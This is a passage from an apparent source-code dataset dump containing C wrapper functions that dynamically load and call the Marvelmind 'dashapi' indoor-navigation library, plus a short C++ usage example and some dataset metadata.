res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool 
(*pt_mm_sleep_device)(uint8_t address);\r\nstatic pt_mm_sleep_device pmm_sleep_device= NULL;\r\nbool mmSendToSleepDevice(uint8_t address) {\r\n if (pmm_sleep_device == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_sleep_device)(address);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_beacon_tele) (uint8_t address, void *pdata);\r\nstatic pt_mm_get_beacon_tele pmm_get_beacon_tele= NULL;\r\nbool mmGetBeaconTelemetry(uint8_t address, MarvelmindBeaconTelemetry *bTele) {\r\n if (pmm_get_beacon_tele == NULL)\r\n return false;\r\n\r\n uint8_t buf[128];\r\n uint8_t i;\r\n bool res= (*pmm_get_beacon_tele)(address, (void *) &buf[0]);\r\n\r\n bTele->worktimeSec= *((uint32_t *) &buf[0]);\r\n bTele->rssi= *((int8_t *) &buf[4]);\r\n bTele->temperature= *((int8_t *) &buf[5]);\r\n bTele->voltageMv= *((uint16_t *) &buf[6]);\r\n\r\n for(i=0;i<16;i++) {\r\n bTele->reserved[i]= buf[8+i];\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_last_locations) (void *pdata);\r\nstatic pt_mm_get_last_locations pmm_get_last_locations= NULL;\r\nbool mmGetLastLocations(MarvelmindLocationsPack *posPack) {\r\n if (pmm_get_last_locations == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_last_locations)((void *) &buf[0]);\r\n\r\n uint16_t ofs= 0;\r\n MarvelmindDeviceLocation *ppos;\r\n for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n ppos= &posPack->pos[i];\r\n\r\n ppos->address= buf[ofs+0];\r\n ppos->headIndex= buf[ofs+1];\r\n\r\n ppos->x_mm= *((int32_t *) &buf[ofs+2]);\r\n ppos->y_mm= *((int32_t *) &buf[ofs+6]);\r\n ppos->z_mm= *((int32_t *) &buf[ofs+10]);\r\n\r\n ppos->statusFlags= buf[ofs+14];\r\n ppos->quality= buf[ofs+15];\r\n\r\n ppos->reserved[0]= buf[ofs+16];\r\n ppos->reserved[1]= buf[ofs+17];\r\n\r\n ofs+= 18;\r\n }\r\n\r\n posPack->lastDistUpdated= buf[ofs++];\r\n for(i=0;i<5;i++) {\r\n posPack->reserved[i]= buf[ofs++];\r\n }\r\n\r\n posPack->userPayloadSize= buf[ofs++];\r\n uint8_t n= posPack->userPayloadSize;\r\n if (n>MM_USER_PAYLOAD_BUF_SIZE) {\r\n n= MM_USER_PAYLOAD_BUF_SIZE;\r\n }\r\n for(i=0;i<n;i++) {\r\n posPack->userPayloadBuf[i]= buf[ofs++];\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_last_locations2) (void *pdata);\r\nstatic pt_mm_get_last_locations2 pmm_get_last_locations2= NULL;\r\nbool mmGetLastLocations2(MarvelmindLocationsPack2 *posPack) {\r\n if (pmm_get_last_locations2 == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_last_locations2)((void *) &buf[0]);\r\n\r\n uint16_t ofs= 0;\r\n MarvelmindDeviceLocation2 *ppos;\r\n for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n ppos= &posPack->pos[i];\r\n\r\n ppos->address= buf[ofs+0];\r\n ppos->headIndex= buf[ofs+1];\r\n\r\n ppos->x_mm= *((int32_t *) &buf[ofs+2]);\r\n ppos->y_mm= *((int32_t *) &buf[ofs+6]);\r\n ppos->z_mm= *((int32_t *) &buf[ofs+10]);\r\n\r\n ppos->statusFlags= buf[ofs+14];\r\n ppos->quality= buf[ofs+15];\r\n\r\n ppos->reserved[0]= buf[ofs+16];\r\n ppos->reserved[1]= buf[ofs+17];\r\n\r\n ppos->angle= *((uint16_t *) &buf[ofs+18]);\r\n ppos->angleReady= ((ppos->angle&0x1000) == 0);\r\n\r\n ofs+= 20;\r\n }\r\n\r\n posPack->lastDistUpdated= buf[ofs++];\r\n for(i=0;i<5;i++) {\r\n posPack->reserved[i]= buf[ofs++];\r\n }\r\n\r\n posPack->userPayloadSize= buf[ofs++];\r\n uint8_t n= posPack->userPayloadSize;\r\n if (n>MM_USER_PAYLOAD_BUF_SIZE) {\r\n n= MM_USER_PAYLOAD_BUF_SIZE;\r\n }\r\n for(i=0;i<n;i++) {\r\n posPack->userPayloadBuf[i]= buf[ofs++];\r\n }\r\n\r\n return 
res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_last_distances) (void *pdata);\r\nstatic pt_mm_get_last_distances pmm_get_last_distances= NULL;\r\nbool mmGetLastDistances(MarvelmindDistances *distPack) {\r\n if (pmm_get_last_distances == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_last_distances)((void *) &buf[0]);\r\n\r\n distPack->numDistances= buf[0];\r\n if (distPack->numDistances > MM_DISTANCES_PACK_MAX_SIZE) {\r\n distPack->numDistances= MM_DISTANCES_PACK_MAX_SIZE;\r\n }\r\n\r\n uint16_t ofs= 1;\r\n MarvelmindDistance *pdist;\r\n for(i=0;i<distPack->numDistances;i++) {\r\n pdist= &distPack->distance[i];\r\n\r\n pdist->addressRx= buf[ofs+0];\r\n pdist->headRx= buf[ofs+1];\r\n pdist->addressTx= buf[ofs+2];\r\n pdist->headTx= buf[ofs+3];\r\n\r\n pdist->distance_mm= *((uint32_t *) &buf[ofs+4]);\r\n\r\n pdist->reserved= buf[ofs+8];\r\n\r\n ofs+= 9;\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_update_rate_setting) (float *updRateHz);\r\nstatic pt_mm_get_update_rate_setting pmm_get_update_rate_setting= NULL;\r\nbool mmGetUpdateRateSetting(float *updRateHz) {\r\n if (pmm_get_update_rate_setting == NULL)\r\n return false;\r\n\r\n uint8_t buf[8];\r\n bool res= (*pmm_get_update_rate_setting)((void *) &buf[0]);\r\n\r\n if (res) {\r\n uint32_t updRate_mHz= *((uint32_t *) &buf[0]);\r\n\r\n *updRateHz= updRate_mHz/1000.0;\r\n }\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_set_update_rate_setting) (float *updRateHz);\r\nstatic pt_mm_set_update_rate_setting pmm_set_update_rate_setting= NULL;\r\nbool mmSetUpdateRateSetting(float *updRateHz) {\r\n if (pmm_set_update_rate_setting == NULL)\r\n return false;\r\n\r\n uint8_t buf[8];\r\n\r\n uint32_t updRate_mHz= (*updRateHz)*1000.0;\r\n *((uint32_t *) &buf[0])= updRate_mHz;\r\n\r\n bool res= (*pmm_set_update_rate_setting)((void *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_add_submap) (uint8_t submapId);\r\nstatic pt_mm_add_submap pmm_add_submap= NULL;\r\nbool mmAddSubmap(uint8_t submapId) {\r\n if (pmm_add_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_add_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_delete_submap) (uint8_t submapId);\r\nstatic pt_mm_delete_submap pmm_delete_submap= NULL;\r\nbool mmDeleteSubmap(uint8_t submapId) {\r\n if (pmm_delete_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_delete_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_freeze_submap) (uint8_t submapId);\r\nstatic pt_mm_freeze_submap pmm_freeze_submap= NULL;\r\nbool mmFreezeSubmap(uint8_t submapId) {\r\n if (pmm_freeze_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_freeze_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_unfreeze_submap) (uint8_t submapId);\r\nstatic pt_mm_unfreeze_submap pmm_unfreeze_submap= NULL;\r\nbool mmUnfreezeSubmap(uint8_t submapId) {\r\n if (pmm_unfreeze_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_unfreeze_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_submap_settings) (uint8_t submapId, void *pdata);\r\nstatic pt_mm_get_submap_settings pmm_get_submap_settings= NULL;\r\nbool mmGetSubmapSettings(uint8_t submapId, MarvelmindSubmapSettings *submapSettings) {\r\n if (pmm_get_submap_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_submap_settings)(submapId, (void *) &buf[0]);\r\n\r\n 
submapSettings->startingBeacon= buf[0];\r\n submapSettings->startingSet_1= buf[1];\r\n submapSettings->startingSet_2= buf[2];\r\n submapSettings->startingSet_3= buf[3];\r\n submapSettings->startingSet_4= buf[4];\r\n\r\n submapSettings->enabled3d= (bool) buf[5];\r\n submapSettings->onlyForZ= (bool) buf[6];\r\n\r\n submapSettings->limitationDistanceIsManual= (bool) buf[7];\r\n submapSettings->maximumDistanceManual_m= buf[8];\r\n\r\n submapSettings->submapShiftX_cm= *((int16_t *) &buf[9]);\r\n submapSettings->submapShiftY_cm= *((int16_t *) &buf[11]);\r\n submapSettings->submapShiftZ_cm= *((int16_t *) &buf[13]);\r\n submapSettings->submapRotation_cdeg= *((uint16_t *) &buf[15]);\r\n\r\n submapSettings->planeQw= *((int16_t *) &buf[17]);\r\n submapSettings->planeQx= *((int16_t *) &buf[19]);\r\n submapSettings->planeQy= *((int16_t *) &buf[21]);\r\n submapSettings->planeQz= *((int16_t *) &buf[23]);\r\n\r\n submapSettings->serviceZoneThickness_cm= *((int16_t *) &buf[25]);\r\n\r\n submapSettings->hedgesHeightFor2D_cm= *((int16_t *) &buf[27]);\r\n\r\n submapSettings->frozen= (bool) buf[29];\r\n submapSettings->locked= (bool) buf[30];\r\n\r\n submapSettings->beaconsHigher= (bool) buf[31];\r\n submapSettings->mirrored= (bool) buf[32];\r\n\r\n uint8_t ofs= 33;\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n submapSettings->beacons[i]= buf[ofs+i];\r\n }\r\n ofs+= MM_SUBMAP_BEACONS_MAX_NUM;\r\n\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n submapSettings->nearbySubmaps[i]= buf[ofs+i];\r\n }\r\n ofs+= MM_NEARBY_SUBMAPS_MAX_NUM;\r\n\r\n submapSettings->serviceZonePointsNum= buf[ofs++];\r\n for(i=0;i<MM_SUBMAP_SERVICE_ZONE_MAX_POINTS;i++) {\r\n submapSettings->serviceZonePolygon[i].x= *((int16_t *) &buf[ofs]);\r\n submapSettings->serviceZonePolygon[i].y= *((int16_t *) &buf[ofs+2]);\r\n\r\n ofs+= 4;\r\n }\r\n\r\n return res;\r\n}\r\n\r\n\r\ntypedef bool (*pt_mm_set_submap_settings) (uint8_t submapId, void *pdata);\r\nstatic pt_mm_set_submap_settings pmm_set_submap_settings= NULL;\r\nbool mmSetSubmapSettings(uint8_t submapId, MarvelmindSubmapSettings *submapSettings) {\r\n if (pmm_set_submap_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n\r\n buf[0]= submapSettings->startingBeacon;\r\n buf[1]= submapSettings->startingSet_1;\r\n buf[2]= submapSettings->startingSet_2;\r\n buf[3]= submapSettings->startingSet_3;\r\n buf[4]= submapSettings->startingSet_4;\r\n\r\n buf[5]= (uint8_t) submapSettings->enabled3d;\r\n buf[6]= (uint8_t) submapSettings->onlyForZ;\r\n\r\n buf[7]= (uint8_t) submapSettings->limitationDistanceIsManual;\r\n buf[8]= submapSettings->maximumDistanceManual_m;\r\n\r\n *((int16_t *) &buf[9])= submapSettings->submapShiftX_cm;\r\n *((int16_t *) &buf[11])= submapSettings->submapShiftY_cm;\r\n *((int16_t *) &buf[13])= submapSettings->submapShiftZ_cm;\r\n *((uint16_t *) &buf[15])= submapSettings->submapRotation_cdeg;\r\n\r\n *((int16_t *) &buf[17])= submapSettings->planeQw;\r\n *((int16_t *) &buf[19])= submapSettings->planeQx;\r\n *((int16_t *) &buf[21])= submapSettings->planeQy;\r\n *((int16_t *) &buf[23])= submapSettings->planeQz;\r\n\r\n *((int16_t *) &buf[25])= submapSettings->serviceZoneThickness_cm;\r\n\r\n *((int16_t *) &buf[27])= submapSettings->hedgesHeightFor2D_cm;\r\n\r\n buf[29]= (uint8_t) submapSettings->frozen;\r\n buf[30]= (uint8_t) submapSettings->locked;\r\n\r\n buf[31]= (uint8_t) submapSettings->beaconsHigher;\r\n buf[32]= (uint8_t) submapSettings->mirrored;\r\n\r\n uint8_t ofs= 33;\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n buf[ofs+i]= 
submapSettings->beacons[i];\r\n }\r\n ofs+= MM_SUBMAP_BEACONS_MAX_NUM;\r\n\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n buf[ofs+i]= submapSettings->nearbySubmaps[i];\r\n }\r\n ofs+= MM_NEARBY_SUBMAPS_MAX_NUM;\r\n\r\n buf[ofs++]= submapSettings->serviceZonePointsNum;\r\n for(i=0;i<MM_SUBMAP_SERVICE_ZONE_MAX_POINTS;i++) {\r\n *((int16_t *) &buf[ofs])= submapSettings->serviceZonePolygon[i].x;\r\n *((int16_t *) &buf[ofs+2])= submapSettings->serviceZonePolygon[i].y;\r\n\r\n ofs+= 4;\r\n }\r\n\r\n bool res= (*pmm_set_submap_settings)(submapId, (void *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_ultrasound_settings) (uint8_t address, void *pdata);\r\nstatic pt_mm_get_ultrasound_settings pmm_get_ultrasound_settings= NULL;\r\nbool mmGetUltrasoundSettings(uint8_t address, MarvelmindUltrasoundSettings *usSettings) {\r\n if (pmm_get_ultrasound_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n uint8_t i;\r\n bool res= (*pmm_get_ultrasound_settings)(address, (void *) &buf[0]);\r\n\r\n if (res) {\r\n usSettings->txFrequency_hz= *((uint16_t *) &buf[0]);\r\n usSettings->txPeriodsNumber= buf[2];\r\n\r\n usSettings->rxAmplifierAGC= (bool) buf[3];\r\n usSettings->rxAmplificationManual= *((uint16_t *) &buf[4]);\r\n\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n usSettings->sensorsNormal[i]= (bool) buf[6+i];\r\n }\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n usSettings->sensorsFrozen[i]= (bool) buf[11+i];\r\n }\r\n\r\n usSettings->rxDSPFilterIndex= buf[16];\r\n }\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_set_ultrasound_settings) (uint8_t address, void *pdata);\r\nstatic pt_mm_set_ultrasound_settings pmm_set_ultrasound_settings= NULL;\r\nbool mmSetUltrasoundSettings(uint8_t address, MarvelmindUltrasoundSettings *usSettings) {\r\n if (pmm_set_ultrasound_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n uint8_t i;\r\n\r\n *((uint16_t *) &buf[0])= usSettings->txFrequency_hz;\r\n buf[2]= usSettings->txPeriodsNumber;\r\n\r\n buf[3]= (uint8_t) usSettings->rxAmplifierAGC;\r\n *((uint16_t *) &buf[4])= usSettings->rxAmplificationManual;\r\n\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n buf[6+i]= (uint8_t) usSettings->sensorsNormal[i];\r\n }\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n buf[11+i]= (uint8_t) usSettings->sensorsFrozen[i];\r\n }\r\n\r\n buf[16]= usSettings->rxDSPFilterIndex;\r\n\r\n bool res= (*pmm_set_ultrasound_settings)(address, (void *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_erase_map) ();\r\nstatic pt_mm_erase_map pmm_erase_map= NULL;\r\nbool mmEraseMap() {\r\n if (pmm_erase_map == NULL)\r\n return false;\r\n\r\n return (*pmm_erase_map)();\r\n}\r\n\r\ntypedef bool (*pt_mm_set_default_settings) (uint8_t address);\r\nstatic pt_mm_set_default_settings pmm_set_default_settings= NULL;\r\nbool mmSetDefaultSettings(uint8_t address) {\r\n if (pmm_set_default_settings == NULL)\r\n return false;\r\n\r\n return (*pmm_set_default_settings)(address);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_beacons_to_axes) (void *pdata);\r\nstatic pt_mm_beacons_to_axes pmm_beacons_to_axes= NULL;\r\nbool mmBeaconsToAxes(uint8_t address_0, uint8_t address_x, uint8_t address_y) {\r\n if (pmm_beacons_to_axes == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n\r\n buf[0]= address_0;\r\n buf[1]= address_x;\r\n buf[2]= address_y;\r\n\r\n return (*pmm_beacons_to_axes)((void *) &buf[0]);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_read_flash_dump) (uint32_t offset, uint32_t size, void *pdata);\r\nstatic pt_read_flash_dump 
pmm_read_flash_dump= NULL;\r\nbool mmReadFlashDump(uint32_t offset, uint32_t size, void *pdata) {\r\n if (pmm_read_flash_dump == NULL)\r\n return false;\r\n\r\n return (*pmm_read_flash_dump)(offset, size, pdata);\r\n}\r\n\r\ntypedef bool (*pt_write_flash_dump) (uint32_t offset, uint32_t size, void *pdata);\r\nstatic pt_write_flash_dump pmm_write_flash_dump= NULL;\r\nbool mmWriteFlashDump(uint32_t offset, uint32_t size, void *pdata) {\r\n if (pmm_write_flash_dump == NULL)\r\n return false;\r\n\r\n return (*pmm_write_flash_dump)(offset, size, pdata);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_reset_device) (uint8_t address);\r\nstatic pt_mm_reset_device pmm_reset_device= NULL;\r\nbool mmResetDevice(uint8_t address) {\r\n if (pmm_reset_device == NULL)\r\n return false;\r\n\r\n return (*pmm_reset_device)(address);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_air_temperature) (void *pdata);\r\nstatic pt_mm_get_air_temperature pmm_get_air_temperature= NULL;\r\nbool mmGetAirTemperature(int8_t *ptemperature) {\r\n if (pmm_get_air_temperature == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n\r\n bool res= (*pmm_get_air_temperature)((void *) &buf[0]);\r\n if (res) {\r\n *ptemperature= (int8_t) buf[0];\r\n }\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_set_air_temperature) (void *pdata);\r\nstatic pt_mm_set_air_temperature pmm_set_air_temperature= NULL;\r\nbool mmSetAirTemperature(int8_t temperature) {\r\n if (pmm_set_air_temperature == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n buf[0]= temperature;\r\n\r\n return (*pmm_set_air_temperature)((void *) &buf[0]);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_set_beacon_location) (uint8_t address, void *pdata);\r\nstatic pt_mm_set_beacon_location pmm_set_beacon_location= NULL;\r\nbool mmSetBeaconLocation(uint8_t address, int32_t x_mm, int32_t y_mm, int32_t z_mm) {\r\n if (pmm_set_beacon_location == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n\r\n *((int32_t *) &buf[0])= x_mm;\r\n *((int32_t *) &buf[4])= y_mm;\r\n *((int32_t *) &buf[8])= z_mm;\r\n\r\n return (*pmm_set_beacon_location)(address, (void *) &buf[0]);\r\n}\r\n\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_device_is_modem)(uint8_t deviceType);\r\nstatic pt_mm_device_is_modem pmm_device_is_modem= NULL;\r\nbool mmDeviceIsModem(uint8_t deviceType) {\r\n if (pmm_device_is_modem == NULL)\r\n return false;\r\n\r\n return (*pmm_device_is_modem)(deviceType);\r\n}\r\n\r\ntypedef bool (*pt_mm_device_is_beacon)(uint8_t deviceType);\r\nstatic pt_mm_device_is_beacon pmm_device_is_beacon= NULL;\r\nbool mmDeviceIsBeacon(uint8_t deviceType) {\r\n if (pmm_device_is_beacon == NULL)\r\n return false;\r\n\r\n return (*pmm_device_is_beacon)(deviceType);\r\n}\r\n\r\ntypedef bool (*pt_mm_device_is_hedgehog) (uint8_t deviceType);\r\nstatic pt_mm_device_is_hedgehog pmm_device_is_hedgehog= NULL;\r\nbool mmDeviceIsHedgehog(uint8_t deviceType) {\r\n if (pmm_device_is_hedgehog == NULL)\r\n return false;\r\n\r\n return (*pmm_device_is_hedgehog)(deviceType);\r\n}\r\n\r\n//////\r\n\r\nvoid marvelmindAPILoad() {\r\n#ifdef WIN32\r\n mmLibrary= LoadLibrary(\"dashapi.dll\");\r\n\r\n pmm_api_version= (pt_mm_api_version ) GetProcAddress(mmLibrary, \"mm_api_version\");\r\n\r\n pmm_open_port= (pt_mm_open_port ) GetProcAddress(mmLibrary, \"mm_open_port\");\r\n pmm_open_port_by_name= (pt_mm_open_port_by_name ) GetProcAddress(mmLibrary, \"mm_open_port_by_name\");\r\n pmm_close_port= (pt_mm_close_port ) GetProcAddress(mmLibrary, \"mm_close_port\");\r\n\r\n pmm_get_version_and_id= 
(pt_mm_get_version_and_id ) GetProcAddress(mmLibrary, \"mm_get_device_version_and_id\");\r\n pmm_get_devices_list= (pt_mm_get_devices_list ) GetProcAddress(mmLibrary, \"mm_get_devices_list\");\r\n\r\n pmm_wake_device= (pt_mm_wake_device ) GetProcAddress(mmLibrary, \"mm_wake_device\");\r\n pmm_sleep_device= (pt_mm_sleep_device ) GetProcAddress(mmLibrary, \"mm_send_to_sleep_device\");\r\n\r\n pmm_get_beacon_tele= (pt_mm_get_beacon_tele ) GetProcAddress(mmLibrary, \"mm_get_beacon_telemetry\");\r\n\r\n pmm_get_last_locations= (pt_mm_get_last_locations ) GetProcAddress(mmLibrary, \"mm_get_last_locations\");\r\n pmm_get_last_locations2= (pt_mm_get_last_locations2 ) GetProcAddress(mmLibrary, \"mm_get_last_locations2\");\r\n\r\n pmm_get_last_distances= (pt_mm_get_last_distances ) GetProcAddress(mmLibrary, \"mm_get_last_distances\");\r\n\r\n pmm_get_update_rate_setting= (pt_mm_get_update_rate_setting ) GetProcAddress(mmLibrary, \"mm_get_update_rate_setting\");\r\n pmm_set_update_rate_setting= (pt_mm_set_update_rate_setting ) GetProcAddress(mmLibrary, \"mm_set_update_rate_setting\");\r\n\r\n pmm_add_submap= (pt_mm_add_submap ) GetProcAddress(mmLibrary, \"mm_add_submap\");\r\n pmm_delete_submap= (pt_mm_delete_submap ) GetProcAddress(mmLibrary, \"mm_delete_submap\");\r\n\r\n pmm_freeze_submap= (pt_mm_freeze_submap ) GetProcAddress(mmLibrary, \"mm_freeze_submap\");\r\n pmm_unfreeze_submap= (pt_mm_unfreeze_submap ) GetProcAddress(mmLibrary, \"mm_unfreeze_submap\");\r\n\r\n pmm_get_submap_settings= (pt_mm_get_submap_settings ) GetProcAddress(mmLibrary, \"mm_get_submap_settings\");\r\n pmm_set_submap_settings= (pt_mm_set_submap_settings ) GetProcAddress(mmLibrary, \"mm_set_submap_settings\");\r\n\r\n pmm_get_ultrasound_settings= (pt_mm_get_ultrasound_settings ) GetProcAddress(mmLibrary, \"mm_get_ultrasound_settings\");\r\n pmm_set_ultrasound_settings= (pt_mm_set_ultrasound_settings ) GetProcAddress(mmLibrary, \"mm_set_ultrasound_settings\");\r\n\r\n pmm_erase_map= (pt_mm_erase_map ) GetProcAddress(mmLibrary, \"mm_erase_map\");\r\n pmm_set_default_settings= (pt_mm_set_default_settings ) GetProcAddress(mmLibrary, \"mm_set_default_settings\");\r\n\r\n pmm_beacons_to_axes= (pt_mm_beacons_to_axes ) GetProcAddress(mmLibrary, \"mm_beacons_to_axes\");\r\n\r\n pmm_read_flash_dump= (pt_read_flash_dump ) GetProcAddress(mmLibrary, \"mm_read_flash_dump\");\r\n pmm_write_flash_dump= (pt_write_flash_dump ) GetProcAddress(mmLibrary, \"mm_write_flash_dump\");\r\n\r\n pmm_reset_device= (pt_mm_reset_device ) GetProcAddress(mmLibrary, \"mm_reset_device\");\r\n\r\n pmm_get_air_temperature= (pt_mm_get_air_temperature ) GetProcAddress(mmLibrary, \"mm_get_air_temperature\");\r\n pmm_set_air_temperature= (pt_mm_set_air_temperature ) GetProcAddress(mmLibrary, \"mm_set_air_temperature\");\r\n\r\n pmm_set_beacon_location= (pt_mm_set_beacon_location ) GetProcAddress(mmLibrary, \"mm_set_beacon_location\");\r\n\r\n pmm_device_is_modem= (pt_mm_device_is_modem ) GetProcAddress(mmLibrary, \"mm_device_is_modem\");\r\n pmm_device_is_beacon= (pt_mm_device_is_beacon ) GetProcAddress(mmLibrary, \"mm_device_is_beacon\");\r\n pmm_device_is_hedgehog= (pt_mm_device_is_hedgehog ) GetProcAddress(mmLibrary, \"mm_device_is_hedgehog\");\r\n#else\r\n// not WIN32\r\n mmLibrary = dlopen(\"libdashapi.so\", RTLD_LAZY);\r\n\r\n pmm_api_version= dlsym(mmLibrary, \"mm_api_version\");\r\n\r\n pmm_open_port= dlsym(mmLibrary, \"mm_open_port\");\r\n pmm_close_port= dlsym(mmLibrary, \"mm_close_port\");\r\n\r\n pmm_get_version_and_id= dlsym(mmLibrary, 
\"mm_get_device_version_and_id\");\r\n pmm_get_devices_list= dlsym(mmLibrary, \"mm_get_devices_list\");\r\n\r\n pmm_wake_device= dlsym(mmLibrary, \"mm_wake_device\");\r\n pmm_sleep_device= dlsym(mmLibrary, \"mm_send_to_sleep_device\");\r\n\r\n pmm_get_beacon_tele= dlsym(mmLibrary, \"mm_get_beacon_telemetry\");\r\n\r\n pmm_get_last_locations= dlsym(mmLibrary, \"mm_get_last_locations\");\r\n pmm_get_last_locations2= dlsym(mmLibrary, \"mm_get_last_locations2\");\r\n\r\n pmm_get_last_distances= dlsym(mmLibrary, \"mm_get_last_distances\");\r\n\r\n pmm_get_update_rate_setting= dlsym(mmLibrary, \"mm_get_update_rate_setting\");\r\n pmm_set_update_rate_setting= dlsym(mmLibrary, \"mm_set_update_rate_setting\");\r\n\r\n pmm_add_submap= dlsym(mmLibrary, \"mm_add_submap\");\r\n pmm_delete_submap= dlsym(mmLibrary, \"mm_delete_submap\");\r\n\r\n pmm_freeze_submap= dlsym(mmLibrary, \"mm_freeze_submap\");\r\n pmm_unfreeze_submap= dlsym(mmLibrary, \"mm_unfreeze_submap\");\r\n\r\n pmm_get_submap_settings= dlsym(mmLibrary, \"mm_get_submap_settings\");\r\n pmm_set_submap_settings= dlsym(mmLibrary, \"mm_set_submap_settings\");\r\n\r\n pmm_get_ultrasound_settings= dlsym(mmLibrary, \"mm_get_ultrasound_settings\");\r\n pmm_set_ultrasound_settings= dlsym(mmLibrary, \"mm_set_ultrasound_settings\");\r\n\r\n pmm_erase_map= dlsym(mmLibrary, \"mm_erase_map\");\r\n pmm_set_default_settings= dlsym(mmLibrary, \"mm_set_default_settings\");\r\n\r\n pmm_beacons_to_axes= dlsym(mmLibrary, \"mm_beacons_to_axes\");\r\n\r\n pmm_read_flash_dump= dlsym(mmLibrary, \"mm_read_flash_dump\");\r\n pmm_write_flash_dump= dlsym(mmLibrary, \"mm_write_flash_dump\");\r\n\r\n pmm_reset_device= dlsym(mmLibrary, \"mm_reset_device\");\r\n\r\n pmm_get_air_temperature= dlsym(mmLibrary, \"mm_get_air_temperature\");\r\n pmm_set_air_temperature= dlsym(mmLibrary, \"mm_set_air_temperature\");\r\n\r\n pmm_set_beacon_location= dlsym(mmLibrary, \"mm_set_beacon_location\");\r\n\r\n pmm_device_is_modem= dlsym(mmLibrary, \"mm_device_is_modem\");\r\n pmm_device_is_beacon= dlsym(mmLibrary, \"mm_device_is_beacon\");\r\n pmm_device_is_hedgehog= dlsym(mmLibrary, \"mm_device_is_hedgehog\");\r\n#endif\r\n}\r\n\r\nvoid marvelmindAPIFree() {\r\n#ifdef WIN32\r\n FreeLibrary(mmLibrary);\r\n#else\r\n dlclose(mmLibrary);\r\n#endif\r\n}\r\n"
},
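// A minimal sketch of driving the dynamically loaded dashapi library through
// the wrappers defined above. It assumes libdashapi.so (dashapi.dll on
// Windows) is on the loader path, and that MarvelmindLocationsPack and its
// pos[] entries are declared in marvelmind_api.h with the fields the decoding
// code above fills in (address, x_mm, y_mm, z_mm, quality).
#include <cstdint>
#include <cstdio>
extern "C"
{
#include "marvelmind_nav/marvelmind_api.h"
}

int main()
{
    marvelmindAPILoad();  // resolves the mm_* symbols via dlopen/dlsym
    if (!mmOpenPort()) {  // each wrapper returns false when its symbol is
                          // unresolved or the underlying call fails
        std::printf("modem port not opened\n");
        marvelmindAPIFree();
        return 1;
    }

    uint32_t version = 0;
    if (mmAPIVersion(&version))
        std::printf("dashapi version: %u\n", version);

    MarvelmindLocationsPack pack;
    if (mmGetLastLocations(&pack))
        for (int i = 0; i < MM_LOCATIONS_PACK_SIZE; ++i)
            std::printf("addr %d: x=%d mm, y=%d mm, z=%d mm, quality=%d%%\n",
                        (int) pack.pos[i].address,
                        (int) pack.pos[i].x_mm, (int) pack.pos[i].y_mm,
                        (int) pack.pos[i].z_mm, (int) pack.pos[i].quality);

    mmClosePort();
    marvelmindAPIFree();
    return 0;
}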
{
"alpha_fraction": 0.74490886926651,
"alphanum_fraction": 0.7556270360946655,
"avg_line_length": 22.923076629638672,
"blob_id": "a6458ffb85f6e1026764c066937d06b381b0de64",
"content_id": "0bf6408ac9c4e980a95fe9ceb37e64bd805690ae",
"detected_licenses": [
